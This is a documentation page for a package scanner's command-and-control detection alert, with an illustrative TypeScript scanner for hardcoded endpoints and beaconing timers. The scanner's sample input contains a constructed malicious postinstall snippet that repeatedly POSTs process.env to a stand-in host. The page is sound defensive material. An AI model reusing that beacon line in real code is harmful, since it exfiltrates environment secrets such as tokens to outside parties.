c2Communication

Rendered from docs/alerts/c2Communication.md


Flags indicators of command-and-control (C2) behavior, such as suspicious hardcoded domains/URLs or patterns commonly used for beaconing.

Implemented in: src/lib/detection/plugins/c2-communication.ts
Enabled by default: yes

What it means

The package contains strings or code consistent with communicating with attacker infrastructure.

Why it matters

C2 is how malware receives instructions, exfiltrates data, and stages follow-on payloads.

What to do

  • Identify the host(s) and check reputation / WHOIS / history.
  • Inspect call sites to see when communication happens (install-time vs runtime).
  • Block or isolate the dependency until behavior is understood.

Common fields

  • filePath, lineStart/lineEnd, codeSnippet
  • metadata may include the matched IOC (domain/IP/URL) and rule name
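As an added illustration of the two checks this alert describes (hardcoded remote endpoints and timer-driven beaconing), here is a small scanner that emits findings shaped like the Common fields above. It is not the plugin's own code; the allow-list, rule names, sample script and `.invalid` host are constructed for the example.

```typescript
// Added illustration, not the plugin's own code; field names mirror "Common fields".
interface Finding {
  filePath: string; lineStart: number; lineEnd: number; codeSnippet: string;
  metadata: { rule: string; ioc?: string };
}
// Remote endpoints embedded as literals: http(s) URLs or bare IPv4 addresses.
const URL_RE = /https?:\/\/[^\s'"`)]+/g;
const IPV4_RE = /\b(?:\d{1,3}\.){3}\d{1,3}\b/g;
// Beaconing shape: a timer whose body issues an outbound request.
const TIMER_RE = /\bset(?:Interval|Timeout)\s*\(/;
const REQUEST_RE = /\b(?:fetch|XMLHttpRequest|https?\.request|axios)\b/;
// Constructed allow-list; a real tool would consult a curated reputation source.
const ALLOWED_HOSTS = new Set(['localhost', '127.0.0.1', 'registry.npmjs.org']);

// Host part of a URL literal: strip scheme, then cut at path, port, query or fragment.
function hostOf(url: string): string {
  return url.replace(/^https?:\/\//, '').split(/[/:?#]/)[0];
}

function scanSource(filePath: string, source: string): Finding[] {
  const lines = source.split('\n');
  const findings: Finding[] = [];
  lines.forEach((line, i) => {
    const lineNo = i + 1;
    const urls = line.match(URL_RE) ?? [];
    // Bare IPs that are not already part of a matched URL.
    const ips = (line.match(IPV4_RE) ?? []).filter(ip => !urls.some(u => u.includes(ip)));
    for (const ioc of [...urls.map(hostOf), ...ips]) {
      if (ALLOWED_HOSTS.has(ioc)) continue;
      findings.push({ filePath, lineStart: lineNo, lineEnd: lineNo,
        codeSnippet: line.trim(), metadata: { rule: 'hardcoded-endpoint', ioc } });
    }
    if (TIMER_RE.test(line)) {
      // Accept the request call on the timer line itself or on the line after it.
      const off = REQUEST_RE.test(line) ? 0 : REQUEST_RE.test(lines[i + 1] ?? '') ? 1 : -1;
      if (off >= 0) findings.push({ filePath, lineStart: lineNo, lineEnd: lineNo + off,
        codeSnippet: lines.slice(i, i + off + 1).join('\n').trim(),
        metadata: { rule: 'beacon-timer' } });
    }
  });
  return findings;
}

// Constructed sample shaped like a malicious postinstall script; ".invalid" is a placeholder TLD.
const SAMPLE = [
  "const C2 = 'http://c2.example.invalid/api/checkin';",
  "setInterval(() => {",
  "  fetch(C2, { method: 'POST', body: JSON.stringify(process.env) });",
  "}, 60000);",
  "fetch('https://registry.npmjs.org/-/ping');",
].join('\n');
console.log(JSON.stringify(scanSource('node_modules/evil-pkg/postinstall.js', SAMPLE), null, 2));
```

The registry ping on the last sample line is suppressed by the allow-list, which is the kind of triage the "What to do" steps ask you to perform on every matched host.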